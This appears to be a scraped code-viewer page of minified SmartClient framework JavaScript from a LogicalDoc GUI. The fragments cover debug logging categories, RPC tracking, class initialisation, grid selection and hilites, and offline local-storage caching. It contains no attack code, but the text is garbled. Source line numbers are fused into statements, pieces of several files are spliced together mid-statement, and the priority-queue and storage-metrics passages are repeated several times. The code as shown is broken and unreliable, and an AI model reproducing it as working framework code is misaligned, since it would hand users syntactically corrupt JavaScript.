RPC responses (can be slow)"},{name:"xmlComm",description:"Inbound and outbound XML messages"},{name:"xmlSelect",description:"XPath expressions and their results"},{name:"xmlBinding",description:"DataSource and WebService XML request/response handling"},{name:"xmlToJS",description:"XML to JavaScript translation in databinding"},{name:"ResultSet",description:"Load on demand and cache update management for ListGrids"},{name:"ResultTree",description:"Load on demand for TreeGrids"},{name:"FileLoader",description:"Background download and caching of files"},{name:"fetchTrace",description:"Shows a stack trace for all fetches initiated through a ResultSet"},{name:"dragDrop",description:"Drag and drop related logs"},{name:"EventHandler",description:"Mouse and keyboard events, bubbling, cancellation"},{name:"visualState",description:"Visual state transitions for buttons, bars, and other stateful widgets"},{name:"RpcTabTiming",description:"Show detailed timing data for RPC/DSRequests in the RPC tab"},{name:"gridEdit",description:"Inline editing in grids"},{name:"Page",description:"Page-wide events"},{name:"loadTime",description:"ISC load / parse time"},{name:"redraws",description:"Logging of redraw()s and reasons for them"},{name:"redrawTrace",description:"Logs a stack trace for every redraw when both 'redraws' and 'redrawTrace' are set to debug priority"},{name:"clears",description:"Logs all clear()s"},{name:"destroys",description:"Logs all destroy()s"},{name:"draws",description:"All component draws"},{name:"resize",description:"Resizes of drawn components"},{name:"testReplay",description:"Details of why Selenium commands are failing during playback"},{name:"DynamicForm"},{name:"ListGrid"},{name:"TreeGrid"},{name:"CubeGrid"},{name:"deprecated",description:"Notify when deprecated attributes are used"}];isc.B.push(isc.A.getGUID=function isc_DebugTarget_getGUID(_1){if(!this.GUID){var _2=isc.LogViewer.getGlobalLogCookieValue("isc_pageGUID");var _3=isc.LogViewer.getGlobalLogCookieValue("isc_pageURL");if(!_2||_3!=location.href){var _4=this;this.Super("getGUID",[function(_2){_4.GUID=_2;isc.LogViewer.setGlobalLogCookieValue("isc_pageURL",location.href);isc.LogViewer.setGlobalLogCookieValue("isc_pageGUID",_4.GUID);_4.fireCallback(_1,"GUID",[_4.GUID])}],arguments);return}else{this.GUID=_2}}1952this.fireCallback(_1,"GUID",[this.GUID])},isc.A.sendTargetAvailableNotify=function isc_DebugTarget_sendTargetAvailableNotify(){this.socket.send("isc_DebugMaster",{methodName:"targetAvailable",args:[this.getServerProperties()]})},isc.A.getServerProperties=function isc_DebugTarget_getServerProperties(){var _1="Desktop";if(isc.Browser.isTablet)_1="Tablet";else if(isc.Browser.isHandset)_1="Handset";return isc.addProperties(this.Super("getServerProperties",arguments),{userAgent:navigator.userAgent,documentTitle:document.title,URL:location.href,formFactor:_1,browserVersion:isc.Browser.version,browserMinorVersion:isc.Browser.minorVersion})},isc.A.pushRPCUpdate=function isc_DebugTarget_pushRPCUpdate(_1){if(!isc.debugMaster)return;var _2={cancelled:_1.cancelled,receiveTime:_1.receiveTime,URL:_1.URL,transactionNum:_1.transactionNum,serializedCommResults:_1.serializedCommResults,serializedCommResultsAreFormatted:_1.serializedCommResultsAreFormatted,transport:_1.transport};var _3=[];for(var i=0;i<_1.operations.length;i++){var _5=_1.operations[i];var _6=_1.responses[i];_3[i]=this.rpcToRecord(_1,_5,_6);if(_1.operations.length>1)_3[i]._queueIndex=i}1953_2.rpcs=_3;isc.debugMaster.call("isc.RPCTracker.updateTransactionRecord",[_2]);_1.pushedToDebugMaster=true},isc.A.rpcToRecord=function isc_DebugTarget_rpcToRecord(_1,_2,_3){var _4=_2._dsRequest||_2.$374;var _5="RPCRequest";if(_4!=null)_5="DSRequest";else if(_2.data&&_2.data.is_ISC_RPC_DMI)_5="RPC DMI";else if(_2.wsOperation)_5="WSRequest";var _6;if(_2.operationType){_6=_2.operationType;if(_2.operationId){_6+="<"+_2.operationId+">"}


235return _14},isc.A.createRaw=function isc_c_Class_createRaw(){if(this.$1226&&!isc.isVisualBuilderSDK){var _1="Attempt to create "+this.getClassName()+". This class requires the Dashboards & Tools framework which is only included with Enterprise licenses.";isc.logWarn(_1);if(!this.$1228){try{isc.warn(_1);this.$1228=true}catch(e){}}236return null}237if(!this.initialized())this.init();var _2=new this.$b4.$b5();_2.ns=this.ns;return _2},isc.A.init=function isc_c_Class_init(){var _1=this.getSuperClass();if(_1!=null&&!_1.initialized())_1.init();var _2=this.$cg;if(_2!=null){this.


$cg=null;var _3=isc.captureDefaults;if(_3)isc.captureDefaults=false;_2.map(function(_4){isc.eval(_4)});if(_3)isc.captureDefaults=true}238if(this.autoDupMethods){isc.Class.duplicateMethods(this,this.autoDupMethods)}239this.$cj[this.Class]=true},isc.A.modifyFrameworkStart=function isc_c_Class_modifyFrameworkStart(){isc.definingFramework=true},isc.A.modifyFrameworkDone=function isc_c_Class_modifyFrameworkDone(){isc.definingFramework=false},isc.A.duplicateMethods=function isc_c_Class_duplicateMethods(_1,_2){if(_1.Class&&this.dontDup[_1.Class])return;for(var i=0;i<_2.length;i++){var _4=_2[i];this.duplicateMethod(_4,_1)}},isc.A.duplicateMethod=function(methodName,target){if(!target)target=this;var method=target[methodName];if(method==null)return;if(method.$761){while(method.$761)method=method.$761}240var dup;if(method.toSource==null){dup=eval("dup = "+method.toString())}else{dup=eval(method.toSource())}241if(!method.$dx)isc.Func.getName(method,true);dup.$dx=method.$dx+"[d]";dup.$761=method;target[methodName]=dup;return dup},isc.A.$1361=function isc_c_Class__createUnsupportedMethodImpl(_1,_2){var _3={};var _4=function(){var _5=this.getClassName();if(_3[_5])return;var _6=_1.replace(/(\$?)\$(class|method)/g,function(_8,_9,_10,_11,_1){if(_9==="$")return"$"+_10;else if(_10==="class")return _5;else if(_10==="method")return _2});this.logWarn(_6);_3[_5]=true};_4.$1362=true;var _7=this.$b4[_2];if(isc.isA.Function(_7)){_4.$123y=isc.Func.getArgString(_7)}242return _4},isc.A.markUnsupportedMethods=function isc_c_Class_markUnsupportedMethods(_1,_2){if(_1==null)_1="$class does not support the $method() method.";for(var i=0;i<_2.length;++i){var _4=_2[i];this.$b4[_4]=this.$1361(_1,_4)}},isc.A.isMethodSupported=function isc_c_Class_isMethodSupported(_1){var _2=this.$b4[_1];return _2!=null&&!_2.$1362},isc.A.isMethodUnsupported=function isc_c_Class_isMethodUnsupported(_1){return!this.isMethodSupported(_1)},isc.A.initialized=function isc_c_Class_initialized(){return this.$cj[this.Class]},isc.A.getClassName=function isc_c_Class_getClassName(){return this.Class},isc.A.getScClassName=function isc_c_Class_getScClassName(){return this.isFrameworkClass?this.Class:this.$75y},isc.A.compareScClassName=function isc_c_Class_compareScClassName(_1,_2){return _1.getScClassName()==_2},isc.A.getSuperClass=function isc_c_Class_getSuperClass(){return this.$b8},isc.A.getPrototype=function isc_c_Class_getPrototype(){return this.$b4},isc.A.addMethods=function isc_c_Class_addMethods(){if(this.$a5){this.logWarn("Use addInterfaceMethods() to add methods to interface "+this)}243for(var i=0;i<arguments.length;i++)244isc.addMethods(this.$b4,arguments[i]);return this.$b4},isc.A.addInterfaceMethods=function isc_c_Class_addInterfaceMethods(){for(var i=0;i<arguments.length;i++)245isc.addMethods(this.$b4,arguments[i])},isc.A.addInterfaceProperties=function isc_c_Class_addInterfaceProperties(){isc.addPropertyList(this.$b4,arguments,true)},isc.A.registerStringMethods=function isc_c_Class_registerStringMethods(_1,_2){var _3=this._stringMethodRegistry;if(!this.isOverridden("_stringMethodRegistry")){var _4={},_5=_4.$cq=(_3.$cq?_3.$cq.duplicate():[]);for(var i=0;i<_5.length;i++){_4[_5[i]]=_3[_5[i]]}


3508if(_4==null){if(this.canSelectCells){if(this.cellRecordMode)_5.cellRecordMode=this.cellRecordMode;_4=isc.CellSelection.create(_5)}else{_4=isc.Selection.create(_5)}}3509this.selection=_4},isc.A.$1483=function isc_Canvas__shouldCascadeSelection(){return this.cascadeSelection},isc.A.destroySelectionModel=function isc_Canvas_destroySelectionModel(){if(!this.selection)return;if(this.selection.destroy)this.selection.destroy();delete this.selection},isc.A.removeSelectionMarkers=function isc_Canvas_removeSelectionMarkers(_1){var _2=true;if(!isc.isAn.Array(_1)){_1=[_1];_2=false}3510_1.clearProperty(this.selectionProperty||this.selection?this.selection.selectionProperty:null);return _2?_1:_1[0]},isc.A.getSelection=function isc_Canvas_getSelection(_1,_2,_3){if(!this.selection)return[];if(this.canSelectCells){return this.selection.getSelection(null,_3)}else{return this.selection.getSelection(_1,_3)}},isc.A.getSelectedRecords=function isc_Canvas_getSelectedRecords(_1){return this.getSelection(_1)},isc.A.getSelectedRecord=function isc_Canvas_getSelectedRecord(){if(!this.selection)return null;return this.selection.getSelectedRecord()},isc.A.getSelectionObject=function isc_Canvas_getSelectionObject(){return this.selection},isc.A.isSelected=function isc_Canvas_isSelected(_1){if(!_1||!this.selection)return false;return this.selection.isSelected(_1)},isc.A.isPartiallySelected=function isc_Canvas_isPartiallySelected(_1)


{if(!_1||!this.selection)return false;return this.selection.isPartiallySelected(_1)},isc.A.selectRecord=function isc_Canvas_selectRecord(_1,_2,_3){this.selectRecords(_1,_2,_3)},isc.A.selectSingleRecord=function isc_Canvas_selectSingleRecord(_1){this.selection.deselectAll();this.selectRecord(_1)},isc.A.deselectRecord=function isc_Canvas_deselectRecord(_1,_2){this.selectRecord(_1,false,_2)},isc.A.selectRecords=function isc_Canvas_selectRecords(_1,_2,_3){if(_2==null)_2=true;if(!isc.isAn.Array(_1))_1=[_1];if(isc.isA.ResultSet(this.data)&&!this.data.lengthIsKnown()){this.logWarn("ignoring attempt to select records while data is loading");return}3511for(var i=0;i<_1.length;i++){if(_1[i]==null)continue;if(isc.isA.Number(_1[i])){var _5=_1[i];_1[i]=this.getRecord(_5,_3)}}3512var _6=this.getSelectionObject(_3);if(_6){_6.selectList(_1,_2,null,this);this.fireSelectionUpdated()}},isc.A.deselectRecords=function isc_Canvas_deselectRecords(_1,_2){this.selectRecords(_1,false,_2)},isc.A.selectAllRecords=function isc_Canvas_selectAllRecords(){this.selection.selectAll();this.fireSelectionUpdated()},isc.A.deselectAllRecords=function isc_Canvas_deselectAllRecords(){this.selection.deselectAll();this.fireSelectionUpdated()},isc.A.selectRange=function isc_Canvas_selectRange(_1,_2,_3){this.selection.selectRange(_1,_2,_3);this.fireSelectionUpdated()},isc.A.deselectRange=function isc_Canvas_deselectRange(_1,_2){this.selection.selectRange(_1,_2);this.fireSelectionUpdated()},isc.A.anySelected=function isc_Canvas_anySelected(){return this.selection&&this.selection.anySelected()},isc.A.getSelectionLength=function isc_Canvas_getSelectionLength(){return this.selection?this.selection.getLength():0},isc.A.getRecord=function isc_Canvas_getRecord(_1,_2){var _3=isc.isA.List(this.data)||isc.isA.ResultSet(this.data);return _3?this.data.get(_1):this.data},isc.A.fireSelectionUpdated=function isc_Canvas_fireSelectionUpdated(){var _1=(this.getRuleScopeComponent?this.getRuleScopeComponent():null);if(this.selectionUpdated||(_1!=null&&(_1.ruleScope||_1.isRuleScope))){var _2=this.getSelection(null,null,true),_3=(_2.length>0?_2[0]:null);if(this.selectionUpdated)this.selectionUpdated(_3,_2);if(_1!=null&&isc.isA.DataBoundComponent(this)){var _4=this,_5=_4.getDataSource(),_6=_4.getLocalId(),_7=_4.hasStableLocalID()||(_4.editNode!=null);if(_3){_3=this.getCleanRecordData(_3);delete _3.$29m}3513if(_5)_1.provideRuleContext(_5.getID(),_3,this,_7);if(_7){_1.provideRuleContext(_6+".selectedRecord",_3,this,true);_1.provideRuleContext(_6+".anySelected",(_3!=null),this,true);_1.provideRuleContext(_6+".multiSelected",(_3?_2.length>1:false),this,true);_1.provideRuleContext(_6+".numSelected",(_3?_2.length:0),this,false)}}}},isc.A.getHiliteIconLeftPadding=function isc_Canvas_getHiliteIconLeftPadding(_1){return(_1.hiliteIconLeftPadding!=null?_1.hiliteIconLeftPadding:this.hiliteIconLeftPadding||0)},isc.A.getHiliteIconRightPadding=function isc_Canvas_getHiliteIconRightPadding(_1){return(_1.hiliteIconRightPadding!=null?_1.hiliteIconRightPadding:this.hiliteIconRightPadding||0)},isc.A.getHiliteIconWidth=function isc_Canvas_getHiliteIconWidth(_1){return(_1.hiliteIconWidth!=null?_1.hiliteIconWidth:(_1.hiliteIconSize!=null?_1.hiliteIconSize:(this.hiliteIconWidth!=null?this.hiliteIconWidth:this.hiliteIconSize)))},isc.A.getHiliteIconHeight=function isc_Canvas_getHiliteIconHeight(_1){return(_1.hiliteIconHeight!=null?_1.hiliteIconHeight:(_1.hiliteIconSize!=null?_1.hiliteIconSize:(this.hiliteIconHeight!=null?this.hiliteIconHeight:this.hiliteIconSize)))},isc.A.getHiliteIconPosition=function isc_Canvas_getHiliteIconPosition(_1){return _1.hiliteIconPosition!=null?_1.hiliteIconPosition:this.hiliteIconPosition},isc.A.getHiliteIconHTML=function isc_Canvas_getHiliteIconHTML(_1,_2){var _3=_2.imageURLPrefix,_4=this.getHiliteIconWidth(_2),_5=this.getHiliteIconHeight(_2),_6=this.getHiliteIconLeftPadding(_2),_7=this.getHiliteIconRightPadding(_2);var _8=isc.Canvas.$xq(_1,_3,_4,_5,_6,_7,null,this);return _8},isc.A.getHilites=function isc_Canvas_getHilites(){return this.hilites},isc.A.setHilites=function isc_Canvas_setHilites(_1){this.hilites=_1;this.$63j(this.hilites)},isc.A.getHiliteState=function isc_Canvas_getHiliteState(_1){var _2=this.getHilites();if(_2==null)return null;if(_1)return _2;return"("+isc.JSON.encode(_2,{dateFormat:"logicalDateConstructor",prettyPrint:false})+")"},isc.A.setHiliteState=function isc_Canvas_setHiliteState(_1){if(_1==null)this.setHilites(null);var _2=eval(_1);this.setHilites(_2)},isc.A.$63j=function isc_Canvas__setupHilites(_1,_2){if(_1!=null){this.$63k=this.$63k||0;var _3={},_4=[];for(var i=0;i<_1.length;i++){var _6=_1[i].id;if(_6!=null){if(_3[_6]){this.logWarn("This component has more than one hilite object with the same specified id:"+_6+". Hilite IDs must be unique within a component.","hiliting")}else{_3[_6]=true;var _7=parseInt(_6);if(_6==_7){this.$63k=Math.max(this.$63k,(_7+1))}}}else{_4.add(_1[i])}}3514for(var i=0;i<_4.length;i++){_4[i].id=this.$63k++}3515this.$58b=_1.makeIndex("id",-1)}3516if(!_2)this.applyHilites()},isc.A.$144l=function isc_Canvas__storeFormulaFieldValues(_1,_2,_3,_4){var _5=[],_6=[];for(var i=0;i<_2.length;i++){var _8=this.getFormulaFunction(_2[i]);if(_8){_5.add(_2[i]);_6.add(_8)}}3517if((_4&&isc.getKeys(_4).length>0)||_5.length>0)3518{for(var j=0;j<_1.length;j++){var _10=_1[j];for(var i=0;i<_5.length;i++){var _11=_5[i],_12=_11[this.fieldIdProperty];if(this.shouldApplyUserFormulaAfterSummary(_11)&&this.shouldShowUserFormula(_11,_10))


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.jsCode:

2469return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}2470this.$788(this.countKey,storedEntries);this.$788(this.keyKey,storedKeyBytes);this.$788(this.valueKey,storedValueBytes)},rebuildMetrics:function(){var pq=this.getPriorityQueue(),entries=0,keyBytes=0,valueBytes=0;for(var i=0;i<pq.length;i++){var value=this.get(pq[i]);entries++;keyBytes+=pq[i].length;valueBytes+=value.length}2471this.$788(this.countKey,entries);this.$788(this.keyKey,keyBytes);this.$788(this.valueKey,valueBytes)},getStorageMetrics:function(){var storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0,countLen=0,keyLen=0,valueLen=0;if(storedEntries)countLen=storedEntries.length;if(storedKeyBytes)keyLen=storedKeyBytes.length;if(storedValueBytes)valueLen=storedValueBytes.length;storedEntries=1*storedEntries;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;var pqText=this.get(this.priorityQueueKey);var overhead=this.countKey.length+this.keyKey.length+this.valueKey.length+countLen+keyLen+valueLen;var pqLength=pqText==null?0:pqText.length+(this.KEY_PREFIX+this.priorityQueueKey).length;return{storedEntries:storedEntries,storedKeyBytes:storedKeyBytes,storedValueBytes:storedValueBytes,metricsOverhead:overhead,priorityQueue:pqLength,total:storedKeyBytes+storedValueBytes+overhead+pqLength}},getTotalStorageUsed:function(){var metrics=this.getStorageMetrics();return metrics.storedKeyBytes+metrics.storedValueBytes+metrics.metricsOverhead+metrics.priorityQueue},storeResponse:function(dsRequest,dsResponse){var ts=new Date().getTime();dsResponse.offlineTimestamp=ts;var trimmedRequest=this.trimRequest(dsRequest),key=this.serialize(trimmedRequest),value=this.serialize(this.trimResponse(dsResponse));this.logDebug("storeResponse serializing: "+(new Date().getTime()-ts)+"ms");if(this.get(key)==null){if(this.getSCStoredValuesCount()>=this.maxResponsesToPersist){this.removeOldestEntry()}}2472this.put(key,value)},trimRequest:function(dsRequest){var keyProps=["dataSource","operationType","operationId","textMatchStyle","values","sortBy","startRow","endRow","data"],trimmed={},undef;for(var i=0;i<keyProps.length;i++){if(dsRequest[keyProps[i]]!==undef){trimmed[keyProps[i]]=dsRequest[keyProps[i]]}}2473return trimmed},trimResponse:function(dsResponse){var keyProps=["dataSource","startRow","endRow","totalRows","data","offlineTimestamp","status","errors","invalidateCache","cacheTimestamp"],trimmed={},undef;for(var i=0;i<keyProps.length;i++){if(dsResponse[keyProps[i]]!==undef){trimmed[keyProps[i]]=dsResponse[keyProps[i]]}}2474return trimmed},getResponse:function(dsRequest){var trimmedRequest=this.trimRequest(dsRequest),key=this.serialize(trimmedRequest),value=this.get(key),returnValue;eval('returnValue = '+value);if(returnValue)returnValue.fromOfflineCache=true;return returnValue},serialize:function(obj){return isc.Comm.serialize(obj,false)},showStorageInfo:function(){if(!this.storageBrowser){if(isc.Offline.localStorageType()==isc.Offline.USERDATA_PERSISTENCE){isc.Timer.setTimeout(function(){isc.say("WARNING: This browser uses an old storage mechanism that does not permit arbitrary key/value pair storage. This means we have to store extra management data, with the upshot that the metrics reported for 'priority queue' and 'overhead' are indicative, but not accurate")},0)}2475this.metricsDF=isc.DynamicForm.create({width:"100%",numCols:6,fields:[{name:"storedEntries",title:"No. entries",disabled:true},{name:"storedKeyBytes",title:"Used by keys",disabled:true},{name:"storedValueBytes",title:"Used by values",disabled:true},{name:"priorityQueue",title:"Used by Priority Queue",disabled:true},{name:"metricsOverhead",title:"Metrics overhead",disabled:true},{name:"total",title:"Total Bytes",disabled:true}]});this.storageLG=isc.ListGrid.create({width:"100%",height:"*",canRemoveRecords:true,removeData:function(record){isc.ask("Remove this entry?",function(value){if(value){isc.Offline.remove(record.key);isc.Offline.refreshStorageInfo()}})},rowDoubleClick:function(record){isc.Offline.createStorageEditorWindow();isc.Offline.storageEditorWindow.show();isc.Offline.storageEditor.editRecord(record)},fields:[{name:"key",width:"25%",title:"Key"},{name:"value",title:"Value"}]});this.storageBrowser=isc.Window.create({autoCenter:true,canDragResize:true,width:Math.floor(isc.Page.getWidth()*0.5),height:Math.floor(isc.Page.getHeight()*0.5),title:"Offline Storage",items:[this.metricsDF,this.storageLG,isc.HLayout.create({width:"100%",height:1,members:[isc.LayoutSpacer.create({width:"*"}),isc.Button.create({title:"Add Entry",click:function(){isc.Offline.createStorageEditorWindow();isc.Offline.storageEditorWindow.show();isc.Offline.storageEditor.editNewRecord()}})]})]})}2476this.storageBrowser.show();this.refreshStorageInfo()},createStorageEditorWindow:function(){if(!isc.Offline.storageEditorWindow){isc.Offline.storageEditor=isc.DynamicForm.create({fields:[{name:"key",title:"Key",editorType:"TextAreaItem",width:400},{name:"value",title:"Value",editorType:"TextAreaItem",width:400},{name:"saveButton",type:"button",title:"Save",click:function(){var form=isc.Offline.storageEditor;if(form.saveOperationType=="update"&&form.getValue("key")!


=form.getOldValue("key"))2477{isc.ask("Key has changed - this will create a new entry. Do you want to retain the old entry as well? (if you answer 'No', it will be removed",function(value){if(value===false){isc.Offline.remove(form.getOldValue("key"))}2478if(value!=null){isc.Offline.put(form.getValue("key"),form.getValue("value"));isc.Offline.storageEditorWindow.hide();isc.Offline.refreshStorageInfo()}})}else{isc.Offline.put(form.getValue("key"),form.getValue("value"));isc.Offline.storageEditorWindow.hide();isc.Offline.refreshStorageInfo()}}}]});isc.Offline.storageEditorWindow=isc.Window.create({bodyProperties:{margin:5},title:"Edit Offline Storage Entry",isModal:true,autoCenter:true,height:280,width:480,items:[isc.Offline.storageEditor]})}},refreshStorageInfo:function(){this.metricsDF.editRecord(isc.Offline.getStorageMetrics());var dataObj=isc.Offline.getCacheContents();var data=[];for(var key in dataObj){data.add({key:key,value:dataObj[key]})}2479this.storageLG.setData(data)}};var UserDataPersistence={isInitialized:false,poolSize:10,keyIndexKey:"keyIndex",reverseKeyIndexKey:"reverseKeyIndex",init:function(){this.userDataSpan=[];for(var i=0;i<this.poolSize;i++){this.userDataSpan[i]=document.createElement('span');this.userDataSpan[i].ID='isc_userData_'+i;this.userDataSpan[i].style.behavior='url(#default#userdata)';document.body.appendChild(this.userDataSpan[i]);this.userDataSpan[i].load("isc_userData_"+i)}


2490counter++}2491this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}2492if(!swapped)break}},getNextAttributeName:function(dataStore){if(this.unusedAttributeNumbers[dataStore]&&this.unusedAttributeNumbers[dataStore].length>0)2493{return"v"+this.unusedAttributeNumbers[dataStore].shift()}2494if(this.nextAttributeNumber[dataStore]==null){this.nextAttributeNumber[dataStore]=1}2495return"v"+this.nextAttributeNumber[dataStore]++},addToKeyIndex:function(userKey,dataStore,attr){var keyIndexValue=this.getKeyIndexValue(dataStore,attr);this.keyIndex[userKey]=keyIndexValue;this.reverseKeyIndex[keyIndexValue]=userKey;this.saveKeyIndex()},removeFromKeyIndex:function(userKey){var keyIndexValue=this.keyIndex[userKey];delete this.keyIndex[userKey];delete this.reverseKeyIndex[keyIndexValue];this.saveKeyIndex()},saveKeyIndex:function(){this.keyIndexStore.setAttribute(this.keyIndexKey,Offline.serialize(this.keyIndex));this.keyIndexStore.setAttribute(this.reverseKeyIndexKey,Offline.serialize(this.reverseKeyIndex));this.keyIndexStore.save("isc_userData_keyIndex")},buildReverseKeyIndex:function(){this.reverseKeyIndex={};for(var key in this.keyIndex){this.reverseKeyIndex[keyIndex[key]]=key}},getKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.keyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2496return ki},getReverseKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.reverseKeyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2497return ki}};if(window.isc){isc.defineClass("Offline").addClassProperties(Offline);isc.defineClass("UserDataPersistence").addClassProperties(UserDataPersistence)}else{isc.addProperties=function(objOne,objTwo){for(var propName in objTwo)objOne[propName]=objTwo[propName]}2498isc.addProperties(isc.Offline,{serialize:function(object){return isc.OfflineJSONEncoder.encode(object)},logDebug:function(message){if(console)console.log(message)},logError:function(message){if(console){console.log(message)}else{alert(message)}},echoLeaf:function(obj){var output="",undef;if(obj===undef)return"undef";try{if(typeof obj=="Array"){output+="Array["+obj.length+"]"}else if(typeof obj=="Date"){output+="Date("+obj.toShortDate()+")"}else if(typeof obj=="Function"){output+=isc.Func.getName(obj,true)+"()"}else{switch(typeof obj){case"string":if(obj.length<=40){output+='"'+obj+'"';break}2499output+='"'+obj.substring(0,40)+'..."['+obj.length+']';output=output.replaceAll("\n","\\n").replaceAll("\r","\\r");break;case"object":if(obj==null){output+="null";break}2500if(obj.tagName!=null){output+="["+obj.tagName+"Element]";break}


2460if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType())


{case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2461return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2462pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2463for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2464this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2465var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2466return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2467return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}2468return userKey},toUserKey:function(internalKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return this.getUndecoratedKey(UserDataPersistence.getUserKey(internalKey))}2469return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}2470this.$788(this.countKey,storedEntries);this.$788(this.keyKey,storedKeyBytes);this.$788(this.valueKey,storedValueBytes)},rebuildMetrics:function(){var pq=this.getPriorityQueue(),entries=0,keyBytes=0,valueBytes=0;for(var i=0;i<pq.length;i++){var value=this.get(pq[i]);entries++;keyBytes+=pq[i].length;valueBytes+=value.length}


2461return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2462pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2463for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2464this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2465var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2466return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}


